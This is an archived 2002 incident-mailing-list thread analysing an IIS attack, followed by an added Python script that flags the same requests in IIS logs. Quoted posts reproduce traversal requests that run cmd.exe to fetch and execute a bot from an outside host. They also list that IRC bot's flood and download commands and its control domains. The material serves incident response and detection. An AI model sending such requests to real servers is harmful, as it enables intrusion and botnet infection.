Security Incidents mailing list archives
Re: new IIS worm? (rcp lsass.exe)
From: "sunzi" <sunzi () mod-x co uk>
Date: Tue, 24 Sep 2002 20:51:24 -0400
HFNetchk was written by Shavlik and is available in a Pro version here: http://www.shavlik.com/

Also, I noticed that they're having a 'Get HFNetChkLT with Free Patch Pushing' event (http://www.shavlik.com/security/prod_gen_request.asp).

There's also Ecora's Patchmeister (www.ecora.com), which is free, but doesn't support patch pushing AFAIK.

cheers,
sunzi

----- Original Message -----
From: "zeno" <bugtraq () cgisecurity net>
To: "Mark Challender" <MarkC () mtbaker wednet edu>
Cc: <pj () esec dk>; <incidents () securityfocus com>
Sent: Tuesday, September 24, 2002 2:28 PM
Subject: Re: new IIS worm? (rcp lsass.exe)
Hardening of IIS with the tools available at Microsoft and using URLSCAN with the EXE blocking on will stop these attacks. Patch, patch, patch, recheck the patches and use URLSCAN!

Does anyone know of a gui windows tool that scans your system and provides you with a list of needed patches, and then allows you to select, and have it autodownload and install them?
I can't seem to find one (needed mostly for iis).

- zeno () cgisecurity com

Mark Challender
Network Administrator
==================
Veni, Vidi, Geeki
==================

-----Original Message-----
From: pj () esec dk [mailto:pj () esec dk]
Sent: Monday, September 23, 2002 3:27 AM
To: incidents () securityfocus com
Subject: Re: new IIS worm? (rcp lsass.exe)

Christian Mock:

Then it seems to go after the web servers, sending the following:

GET /scripts/..%5c..%5cwinnt/system32/cmd.exe?/c+rcp+-b+64.21.95.7.lp:lsass.exe+. HTTP/1.0

and

GET /scripts/..%5c..%5cwinnt/system32/cmd.exe?/c+lsass.exe HTTP/1.0

I've been able to get hold of that lsass.exe binary (9728 bytes), but I lack the skills to analyze it; I'll happily mail it to anybody who asks.
We have seen this attack from 4 different sources since Sept. 16, and have informed the owner of 64.21.95.7 and downloaded the lsass.exe for investigation.

Based on the attack rate this is most likely a scripted or manual attack, not a worm.

Judging from the embedded string in this compressed binary it appears to be an IRC bot based on the kaiten.c code written by contem@efnet, the author of the Slapper worm:

Kaiten Win32 API version 2002 by contem@efnet

The binary contains these domain names, most likely IRC servers used for controlling the bot:

telsa5.mine.nu (Korea)
irc.logicfive.net (Taiwan)
moncredo.shacknet.nu (USA)
telsacredo.shacknet.nu (USA)
lar.ath.cx (Taiwan)

The program accepts commands to make various DOS attacks or download new versions or executables with http:

NOTICE %s :PUSH <target> <port> <secs> = A push flooder
NOTICE %s :TCP <target> <port> <secs> = A syn flooder
NOTICE %s :UDP <target> <port> <secs> = A udp flooder
NOTICE %s :MCON <target> <port> <times> = A connectbomb flooder
NOTICE %s :NICK <nick> = Changes the nick of the client
NOTICE %s :DISABLE <pass> = Disables all packeting from this client
NOTICE %s :ENABLE <pass> = Enables all packeting from this client
NOTICE %s :UPDATE <http address> = Downloads a file off the web and updates the client
NOTICE %s :RUN <http address> = Downloads a file off the web and runs it
NOTICE %s :GET <http address> = Downloads a file off the web
NOTICE %s :ADDSERVER <server> = Adds a server to the list
NOTICE %s :DELSERVER <server> = Deletes a server from the list
NOTICE %s :LISTSERVERS = Lists server on the list
NOTICE %s :KILL = Kills the client
NOTICE %s :VERSION = Requests version of client
NOTICE %s :HELP = Displays this

There seems also to be a default account and password in the German language included in this specific version of Kaiten.

The IIS attack that tries to inject this Trojan usually has another URL with "CONNECT chat.vtm.be:6667". This is an attempt to proxy a connection to port 6667 (IRC) on chat.vtm.be.

Peter Jelver ... eSec A/S http://www.esec.dk
............................................................................
PGP Fingerprint : 47AF FFEC D48F 9C13 0C4F E687 BB8A 128F D85C A7D7

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
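The two request lines and the CONNECT attempt quoted by Peter Jelver give an IIS administrator something concrete to hunt for in the web server logs. The script below is an added example and not code from anyone in this thread: it reads IIS W3C extended log rows (the sample log, its field order, timestamps and client addresses are constructed here), percent-decodes and normalizes each URI, and flags traversal to cmd.exe, an rcp fetch in the query string, and a CONNECT to port 6667. It goes slightly beyond the post in that the normalization also matches forward-slash and repeatedly encoded spellings of the same traversal.

```python
"""Flag the IIS request patterns discussed in the thread in a W3C extended log."""
from collections import Counter
from urllib.parse import unquote

# Default field order; overridden by a "#Fields:" directive in the log.
# The sample below is constructed for this example, not a real capture.
DEFAULT_FIELDS = ["date", "time", "c-ip", "cs-method", "cs-uri-stem", "cs-uri-query", "sc-status"]

SAMPLE_LOG = """#Software: Microsoft Internet Information Services 5.0
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2002-09-23 03:21:07 192.0.2.10 GET /default.htm - 200
2002-09-23 03:21:09 198.51.100.7 GET /scripts/..%5c..%5cwinnt/system32/cmd.exe /c+rcp+-b+64.21.95.7.lp:lsass.exe+. 200
2002-09-23 03:21:10 198.51.100.7 GET /scripts/..%5c..%5cwinnt/system32/cmd.exe /c+lsass.exe 200
2002-09-23 03:21:12 198.51.100.7 CONNECT chat.vtm.be:6667 - 405
"""

IRC_PORT = "6667"


def normalize_uri(uri: str, max_rounds: int = 3) -> str:
    """Percent-decode until the string stops changing (bounded), then unify
    backslashes to forward slashes and lower-case, so that ..%5c, ..%2f and
    a literal ..\\ all compare equal."""
    prev = None
    for _ in range(max_rounds):
        if uri == prev:
            break
        prev, uri = uri, unquote(uri)
    return uri.replace("\\", "/").lower()


def reasons_for(method: str, stem: str, query: str) -> list:
    """Return the reasons a single request looks like the attack traffic
    described in the thread; an empty list means nothing matched."""
    reasons = []
    path = normalize_uri(stem)
    tokens = normalize_uri(query).split("+") if query != "-" else []
    # Directory traversal out of a script directory into cmd.exe.
    if "/../" in path and path.endswith("cmd.exe"):
        reasons.append("traversal to cmd.exe")
        # The first quoted request fetches the bot with rcp via cmd.exe.
        if "rcp" in tokens:
            reasons.append("rcp file fetch")
    # The proxy attempt toward an IRC server on port 6667.
    if method.upper() == "CONNECT" and stem.rsplit(":", 1)[-1] == IRC_PORT:
        reasons.append("CONNECT proxy to IRC port 6667")
    return reasons


def parse_w3c(text: str):
    """Yield one dict per data row, honouring the #Fields directive."""
    fields = DEFAULT_FIELDS
    for line in text.splitlines():
        if not line.strip():
            continue
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if line.startswith("#"):
            continue  # other directives (#Software, #Date, ...)
        parts = line.split(" ")
        if len(parts) != len(fields):
            continue  # malformed row; skip rather than mis-assign columns
        yield dict(zip(fields, parts))


def scan_log(text: str) -> list:
    """Return (client ip, time, reasons) for every suspicious row."""
    hits = []
    for row in parse_w3c(text):
        reasons = reasons_for(row["cs-method"], row["cs-uri-stem"], row["cs-uri-query"])
        if reasons:
            hits.append((row["c-ip"], row["time"], reasons))
    return hits


def sources(hits: list) -> Counter:
    """Count suspicious requests per client address, for a quick triage view."""
    return Counter(ip for ip, _, _ in hits)


if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for ip, when, why in found:
        print(f"{when} {ip}: {', '.join(why)}")
    print("per source:", dict(sources(found)))
```

Run it against a real log by reading the file into `scan_log`; because the matching happens after decoding and separator normalization, the same rule catches the `%5c` form in the post as well as `%2f` or double-encoded spellings, and the CONNECT check matches on the port rather than a particular IRC host name.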
Current thread:
- Re: new IIS worm? (rcp lsass.exe), (continued)
- Re: new IIS worm? (rcp lsass.exe) Mike Lewinski (Sep 23)
- Re: new IIS worm? (rcp lsass.exe) pj (Sep 24)
- RE: new IIS worm? (rcp lsass.exe) Bellenger, Bruno (Paris) (Sep 24)
- Slapper worm DoS james (Sep 24)
- Re: new IIS worm? (rcp lsass.exe) Mike Lewinski (Sep 24)
- Re: new IIS worm? (rcp lsass.exe) Eloy A. Paris (Sep 24)
- RE: new IIS worm? (rcp lsass.exe) Mark Challender (Sep 24)
- Re: new IIS worm? (rcp lsass.exe) zeno (Sep 24)
- Re: new IIS worm? (rcp lsass.exe) James Williams (Sep 24)
- RE: new IIS worm? (rcp lsass.exe) Ben Timby (Sep 24)
- Re: new IIS worm? (rcp lsass.exe) sunzi (Sep 25)
- Re: new IIS worm? (rcp lsass.exe) Nick FitzGerald (Sep 25)
- Re: new IIS worm? (rcp lsass.exe) Faisal Ashraf (Sep 26)
- Re: new IIS worm? (rcp lsass.exe) Christoph Puppe (Sep 25)
- Re: new IIS worm? (rcp lsass.exe) zeno (Sep 24)
- RE: new IIS worm? (rcp lsass.exe) John Campbell (Sep 24)
- RE: new IIS worm? (rcp lsass.exe) Dostie, Joe (Sep 25)
- RE: new IIS worm? (rcp lsass.exe) webbi (Sep 25)
- RE: new IIS worm? (rcp lsass.exe) John Campbell (Sep 25)
- Re: new IIS worm? (rcp lsass.exe) zeno (Sep 25)
- RE: new IIS worm? (rcp lsass.exe) Gaydosh, Adam (Sep 25)
(Thread continues...)